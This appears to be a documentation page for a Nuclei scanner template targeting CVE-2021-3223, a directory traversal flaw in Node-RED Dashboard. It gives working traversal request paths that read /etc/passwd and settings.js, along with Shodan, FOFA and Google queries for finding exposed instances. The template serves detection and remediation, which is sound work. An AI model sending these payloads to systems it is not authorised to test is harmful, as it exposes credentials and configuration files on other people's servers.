Node RED Dashboard <2.26.2 - Local File Inclusion
ID: CVE-2021-3223
Severity: high
Author: gy741,pikpikcu
Tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js
Description
Section titled “Description”NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.
YAML Source
Section titled “YAML Source”id: CVE-2021-3223
info: name: Node RED Dashboard <2.26.2 - Local File Inclusion author: gy741,pikpikcu severity: high description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files. impact: | An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability. reference: - https://github.com/node-red/node-red-dashboard/issues/669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2 - https://nvd.nist.gov/vuln/detail/CVE-2021-3223 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-3223 cwe-id: CWE-22 epss-score: 0.09614 epss-percentile: 0.94637 cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:* metadata: verified: true max-request: 2 vendor: nodered product: node-red-dashboard framework: node.js shodan-query: - title:"Node-RED" - http.title:"node-red" fofa-query: - title="Node-RED" - title="node-red" google-query: intitle:"node-red" tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js
http: - method: GET path: - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'
matchers-condition: or matchers: - type: word part: body words: - "Node-RED web server is listening"
- type: regex part: body regex: - "root:.*:0:0:"# digest: 4a0a0047304502205e6244f37e5e09dc8903204edfc3e6f4f082526ab91b53158e38d89cb762a540022100f0a0d9b50f62c0aa5e2bf326c16f7d644d56caf843bd9ebc7f841196c7ae9067:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-3223.yaml"